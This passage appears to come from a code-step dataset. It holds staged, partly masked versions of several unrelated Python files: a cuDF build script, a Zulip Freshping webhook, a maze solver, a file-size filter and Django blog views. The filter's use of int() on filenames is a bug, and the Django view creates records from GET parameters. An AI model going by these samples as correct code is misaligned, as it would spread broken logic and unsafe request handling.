"step-5": "# Copyright (c) 2018-2020, NVIDIA CORPORATION.\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport sysconfig\nfrom distutils.spawn import find_executable\nfrom distutils.sysconfig import get_python_lib\n\nimport numpy as np\nimport pyarrow as pa\nfrom Cython.Build import cythonize\nfrom Cython.Distutils import build_ext\nfrom setuptools import find_packages, setup\nfrom setuptools.extension import Extension\n\nimport versioneer\n\ninstall_requires = [\"numba\", \"cython\"]\n\ncython_files = [\"cudf/**/*.pyx\"]\n\nCUDA_HOME = os.environ.get(\"CUDA_HOME\", False)\nif not CUDA_HOME:\n path_to_cuda_gdb = shutil.which(\"cuda-gdb\")\n if path_to_cuda_gdb is None:\n raise OSError(\n \"Could not locate CUDA. \"\n \"Please set the environment variable \"\n \"CUDA_HOME to the path to the CUDA installation \"\n \"and try again.\"\n )\n CUDA_HOME = os.path.dirname(os.path.dirname(path_to_cuda_gdb))\n\nif not os.path.isdir(CUDA_HOME):\n raise OSError(f\"Invalid CUDA_HOME: directory does not exist: {CUDA_HOME}\")\n\ncuda_include_dir = os.path.join(CUDA_HOME, \"include\")\n\nCUDF_ROOT = os.environ.get(\"CUDF_ROOT\", \"../../cpp/build/\")\n\ntry:\n nthreads = int(os.environ.get(\"PARALLEL_LEVEL\", \"0\") or \"0\")\nexcept Exception:\n nthreads = 0\n\ncmdclass = versioneer.get_cmdclass()\n\n\nclass build_ext_and_proto(build_ext):\n def run(self):\n # Get protoc\n protoc = None\n if \"PROTOC\" in os.environ and os.path.exists(os.environ[\"PROTOC\"]):\n protoc = os.environ[\"PROTOC\"]\n else:\n protoc = find_executable(\"protoc\")\n if protoc is None:\n sys.stderr.write(\"protoc not found\")\n sys.exit(1)\n\n # Build .proto file\n for source in [\"cudf/utils/metadata/orc_column_statistics.proto\"]:\n output = source.replace(\".proto\", \"_pb2.py\")\n\n if not os.path.exists(output) or (\n os.path.getmtime(source) > os.path.getmtime(output)\n ):\n with open(output, \"a\") as src:\n src.write(\"# flake8: noqa\" + os.linesep)\n src.write(\"# fmt: off\" + os.linesep)\n subprocess.check_call([protoc, \"--python_out=.\", source])\n with open(output, \"r+\") as src:\n new_src_content = (\n \"# flake8: noqa\"\n + os.linesep\n + \"# fmt: off\"\n + os.linesep\n + src.read()\n + \"# fmt: on\"\n + os.linesep\n )\n src.seek(0)\n src.write(new_src_content)\n\n # Run original Cython build_ext command\n build_ext.run(self)\n\n\ncmdclass[\"build_ext\"] = build_ext_and_proto\n\nextensions = [\n Extension(\n \"*\",\n sources=cython_files,\n include_dirs=[\n \"../../cpp/include/cudf\",\n \"../../cpp/include\",\n os.path.join(CUDF_ROOT, \"include\"),\n os.path.join(CUDF_ROOT, \"_deps/libcudacxx-src/include\"),\n os.path.join(\n os.path.dirname(sysconfig.get_path(\"include\")),\n \"libcudf/libcudacxx\",\n ),\n os.path.dirname(sysconfig.get_path(\"include\")),\n np.get_include(),\n pa.get_include(),\n cuda_include_dir,\n ],\n library_dirs=(\n pa.get_library_dirs()\n + [get_python_lib(), os.path.join(os.sys.prefix, \"lib\")]\n ),\n libraries=[\"cudf\"] + pa.get_libraries() + [\"arrow_cuda\"],\n language=\"c++\",\n extra_compile_args=[\"-std=c++14\"],\n )\n]\n\nsetup(\n name=\"cudf\",\n version=versioneer.get_version(),\n description=\"cuDF - GPU Dataframe\",\n url=\"https://github.com/rapidsai/cudf\",\n author=\"NVIDIA Corporation\",\n license=\"Apache 2.0\",\n classifiers=[\n \"Intended Audience :: Developers\",\n \"Topic :: Database\",\n \"Topic :: Scientific/Engineering\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 
3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n # Include the separately-compiled shared library\n setup_requires=[\"cython\", \"protobuf\"],\n ext_modules=cythonize(\n extensions,\n nthreads=nthreads,\n compiler_directives=dict(\n profile=False, language_level=3, embedsignature=True\n ),\n ),\n packages=find_packages(include=[\"cudf\", \"cudf.*\"]),\n package_data=dict.fromkeys(\n find_packages(include=[\"cudf._lib*\"]), [\"*.pxd\"],\n ),\n cmdclass=cmdclass,\n install_requires=install_requires,\n zip_safe=False,\n)\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from typing import Any, Dict
from django.http import HttpRequest, HttpResponse
from zerver.decorator import REQ, has_request_variables, webhook_view
from zerver.lib.response import json_success
from zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message
from zerver.models import UserProfile
FRESHPING_TOPIC_TEMPLATE_TEST = "Freshping"
FRESHPING_TOPIC_TEMPLATE = "{check_name}"
FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = """
{request_url} has just become unreachable.
Error code: {http_status_code}.
""".strip()
FRESHPING_MESSAGE_TEMPLATE_UP = "{request_url} is back up and no longer unreachable."
@webhook_view("Freshping")
@has_request_variables
def api_freshping_webhook(
request: HttpRequest,
user_profile: UserProfile,
payload: Dict[str, Any] = REQ(argument_type="body"),
) -> HttpResponse:
body = get_body_for_http_request(payload)
subject = get_subject_for_http_request(payload)
check_send_webhook_message(request, user_profile, subject, body)
return json_success()
def get_subject_for_http_request(payload: Dict[str, Any]) -> str:
webhook_event_data = payload["webhook_event_data"]
if webhook_event_data["application_name"] == "Webhook test":
subject = FRESHPING_TOPIC_TEMPLATE_TEST
else:
subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=webhook_event_data["check_name"])
return subject
def get_body_for_http_request(payload: Dict[str, Any]) -> str:
webhook_event_data = payload["webhook_event_data"]
if webhook_event_data["check_state_name"] == "Reporting Error":
body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**webhook_event_data)
elif webhook_event_data["check_state_name"] == "Available":
if webhook_event_data["application_name"] == "Webhook test":
body = get_setup_webhook_message("Freshping")
else:
body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)
return body
|
normal
|
{
"blob_id": "f60d02fb14364fb631d87fcf535b2cb5782e728f",
"index": 6539,
"step-1": "<mask token>\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
"step-3": "<mask token>\nFRESHPING_TOPIC_TEMPLATE_TEST = 'Freshping'\nFRESHPING_TOPIC_TEMPLATE = '{check_name}'\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = (\n \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\"\n .strip())\nFRESHPING_MESSAGE_TEMPLATE_UP = (\n '{request_url} is back up and no longer unreachable.')\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
"step-4": "from typing import Any, Dict\nfrom django.http import HttpRequest, HttpResponse\nfrom zerver.decorator import REQ, has_request_variables, webhook_view\nfrom zerver.lib.response import json_success\nfrom zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message\nfrom zerver.models import UserProfile\nFRESHPING_TOPIC_TEMPLATE_TEST = 'Freshping'\nFRESHPING_TOPIC_TEMPLATE = '{check_name}'\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = (\n \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\"\n .strip())\nFRESHPING_MESSAGE_TEMPLATE_UP = (\n '{request_url} is back up and no longer unreachable.')\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
"step-5": "from typing import Any, Dict\n\nfrom django.http import HttpRequest, HttpResponse\n\nfrom zerver.decorator import REQ, has_request_variables, webhook_view\nfrom zerver.lib.response import json_success\nfrom zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message\nfrom zerver.models import UserProfile\n\nFRESHPING_TOPIC_TEMPLATE_TEST = \"Freshping\"\nFRESHPING_TOPIC_TEMPLATE = \"{check_name}\"\n\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\".strip()\nFRESHPING_MESSAGE_TEMPLATE_UP = \"{request_url} is back up and no longer unreachable.\"\n\n\n@webhook_view(\"Freshping\")\n@has_request_variables\ndef api_freshping_webhook(\n request: HttpRequest,\n user_profile: UserProfile,\n payload: Dict[str, Any] = REQ(argument_type=\"body\"),\n) -> HttpResponse:\n\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) -> str:\n webhook_event_data = payload[\"webhook_event_data\"]\n if webhook_event_data[\"application_name\"] == \"Webhook test\":\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=webhook_event_data[\"check_name\"])\n\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) -> str:\n webhook_event_data = payload[\"webhook_event_data\"]\n if webhook_event_data[\"check_state_name\"] == \"Reporting Error\":\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**webhook_event_data)\n elif webhook_event_data[\"check_state_name\"] == \"Available\":\n if webhook_event_data[\"application_name\"] == \"Webhook test\":\n body = get_setup_webhook_message(\"Freshping\")\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n\n return body\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
pairs = ['usdt', 'btc']
warn_msg = '** WARN ** '
info_msg = '** INFO **'
|
normal
|
{
"blob_id": "26289d88ac51ee359faa81ca70b01879d2b1f840",
"index": 9460,
"step-1": "<mask token>\n",
"step-2": "pairs = ['usdt', 'btc']\nwarn_msg = '** WARN ** '\ninfo_msg = '** INFO **'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# -*- coding: utf-8 -*-
def create_map(rows):
maze = []
for row in rows:
row = row[:-1]
subarr = []
for i in row:
subarr.append(i)
maze.append(subarr)
return maze
def print_map(chart):
for subarr in chart:
print(subarr)
def find_start(chart):
for y in range(len(chart)):
row = chart[y]
for x in range(len(row)):
if row[x] == 'S':
return (y, x)
def find_exit(y, x, chart, path):
h = len(chart)
w = len(chart[0])
# left
if x-1 == 0 and chart[y][x-1] == ' ':
chart[y][x-1] = 'E'
path[(y, x-1)] = [y, x]
return
elif x-1 > 0 and chart[y][x-1] == ' ':
chart[y][x-1] = '0'
path[(y, x - 1)] = [y, x]
find_exit(y, x-1, chart, path)
# up
if y-1 == 0 and chart[y-1][x] == ' ':
chart[y-1][x] = 'E'
path[(y-1, x)] = [y, x]
return
elif y-1 > 0 and chart[y-1][x] == ' ':
chart[y-1][x] = '0'
path[(y - 1, x)] = [y, x]
find_exit(y-1, x, chart, path)
# right
if x+1 == w-1 and chart[y][x+1] == ' ':
chart[y][x+1] = 'E'
path[(y, x+1)] = [y, x]
return
elif x+1 < w - 1 and chart[y][x+1] == ' ':
chart[y][x+1] = '0'
path[(y, x + 1)] = [y, x]
find_exit(y, x+1, chart, path)
# down
if y+1 == h-1 and chart[y+1][x] == ' ':
chart[y+1][x] = 'E'
path[(y+1, x)] = [y, x]
return
elif y+1 < h - 1 and chart[y+1][x] == ' ':
chart[y+1][x] = '0'
path[(y + 1, x)] = [y, x]
find_exit(y+1, x, chart, path)
def check_exit(chart):
height = len(chart)
width = len(chart[0])
for x in range(width):
v = chart[0][x]
if v == 'E':
return True, 0, x
v = chart[height-1][x]
if v == 'E':
return True, height-1, x
for y in range(height):
v = chart[y][0]
if v == 'E':
return True, y, 0
v = chart[y][width-1]
if v == 'E':
return True, y, width-1
return False, -1, -1
if __name__ == '__main__':
file = open('../00_text_files/01_labyrinth.txt', 'rt')
labyrinth = file.readlines()
file.close()
maze = create_map(labyrinth)
start = find_start(maze)
maze[start[0]][start[1]] = '0'
path = {}
find_exit(start[0], start[1], maze, path)
print_map(maze)
ex = check_exit(maze)
if ex[0]:
y = ex[1]
x = ex[2]
print([y, x, maze[y][x]])
while True:
coord = (y, x)
if coord in path:
y, x = path[coord]
print([y, x, maze[y][x]])
else:
break
else:
print("NO WAY")
|
normal
|
{
"blob_id": "bde37f3b41c810ab465de5e0ae374703af9f01f3",
"index": 9033,
"step-1": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\n<mask token>\n",
"step-2": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\n<mask token>\n",
"step-3": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height - 1][x]\n if v == 'E':\n return True, height - 1, x\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width - 1]\n if v == 'E':\n return True, y, width - 1\n return False, -1, -1\n\n\n<mask token>\n",
"step-4": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height - 1][x]\n if v == 'E':\n return True, height - 1, x\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width - 1]\n if v == 'E':\n return True, y, width - 1\n return False, -1, -1\n\n\nif __name__ == '__main__':\n file = open('../00_text_files/01_labyrinth.txt', 'rt')\n labyrinth = file.readlines()\n file.close()\n maze = create_map(labyrinth)\n start = find_start(maze)\n maze[start[0]][start[1]] = '0'\n path = {}\n find_exit(start[0], start[1], maze, path)\n print_map(maze)\n ex = check_exit(maze)\n if ex[0]:\n y = ex[1]\n x = ex[2]\n print([y, x, maze[y][x]])\n while True:\n coord = y, x\n if coord in path:\n y, x = path[coord]\n print([y, x, maze[y][x]])\n else:\n break\n else:\n print('NO WAY')\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\ndef create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return (y, x)\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n # left\n if x-1 == 0 and chart[y][x-1] == ' ':\n chart[y][x-1] = 'E'\n path[(y, x-1)] = [y, x]\n return\n elif x-1 > 0 and chart[y][x-1] == ' ':\n chart[y][x-1] = '0'\n path[(y, x - 1)] = [y, x]\n find_exit(y, x-1, chart, path)\n # up\n if y-1 == 0 and chart[y-1][x] == ' ':\n chart[y-1][x] = 'E'\n path[(y-1, x)] = [y, x]\n return\n elif y-1 > 0 and chart[y-1][x] == ' ':\n chart[y-1][x] = '0'\n path[(y - 1, x)] = [y, x]\n find_exit(y-1, x, chart, path)\n # right\n if x+1 == w-1 and chart[y][x+1] == ' ':\n chart[y][x+1] = 'E'\n path[(y, x+1)] = [y, x]\n return\n elif x+1 < w - 1 and chart[y][x+1] == ' ':\n chart[y][x+1] = '0'\n path[(y, x + 1)] = [y, x]\n find_exit(y, x+1, chart, path)\n # down\n if y+1 == h-1 and chart[y+1][x] == ' ':\n chart[y+1][x] = 'E'\n path[(y+1, x)] = [y, x]\n return\n elif y+1 < h - 1 and chart[y+1][x] == ' ':\n chart[y+1][x] = '0'\n path[(y + 1, x)] = [y, x]\n find_exit(y+1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height-1][x]\n if v == 'E':\n return True, height-1, x\n\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width-1]\n if v == 'E':\n return True, y, width-1\n\n return False, -1, -1\n\n\nif __name__ == '__main__':\n file = open('../00_text_files/01_labyrinth.txt', 'rt')\n labyrinth = file.readlines()\n file.close()\n maze = create_map(labyrinth)\n start = find_start(maze)\n maze[start[0]][start[1]] = '0'\n path = {}\n find_exit(start[0], start[1], maze, path)\n print_map(maze)\n\n ex = check_exit(maze)\n if ex[0]:\n y = ex[1]\n x = ex[2]\n print([y, x, maze[y][x]])\n while True:\n coord = (y, x)\n if coord in path:\n y, x = path[coord]\n print([y, x, maze[y][x]])\n else:\n break\n else:\n print(\"NO WAY\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import os
import glob
ONE_KB = 1024
def get_files(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
return (
filename
for _, _, files in os.walk(dirname)
for filename in files
if int(filename) >= size_in_kb * ONE_KB
)
# Pybites solution
def get_files1(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
for file in glob.glob(os.path.join(dirname, "*")):
if os.stat(file).st_size >= size_in_kb * ONE_KB:
yield file
|
normal
|
{
"blob_id": "0dec0f04cfe891eea74ef45484fa7433e3429dcd",
"index": 7570,
"step-1": "<mask token>\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-2": "<mask token>\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-3": "<mask token>\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-4": "import os\nimport glob\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-5": "import os\nimport glob\n\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (\n filename\n for _, _, files in os.walk(dirname)\n for filename in files\n if int(filename) >= size_in_kb * ONE_KB\n )\n\n\n# Pybites solution\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, \"*\")):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render,get_object_or_404, redirect
from django.contrib import admin  # needed in order to use the admin site
from .models import Blog  # bring in the Blog model from this app
from django.utils import timezone
admin.site.register(Blog)  # fetch the Blog model and register it with the admin site
# Create your views here.
def home(request):
blogs = Blog.objects
return render(request,'home.html',{'blogs':blogs})
def detail(request,blog_id):
blog_detail= get_object_or_404(Blog,pk=blog_id)
return render(request,'detail.html',{'blog': blog_detail})
def new(request):
return render(request,'new.html')
def create(request):
blog=Blog()
blog.title=request.GET['title']
blog.body=request.GET['body']
blog.pub_date=timezone.datetime.now()
blog.save()
return redirect('/blog/'+str(blog.id))
|
normal
|
{
"blob_id": "bc25338612f525f616fb26c64d8b36667d297d40",
"index": 3921,
"step-1": "<mask token>\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\n<mask token>\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-2": "<mask token>\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
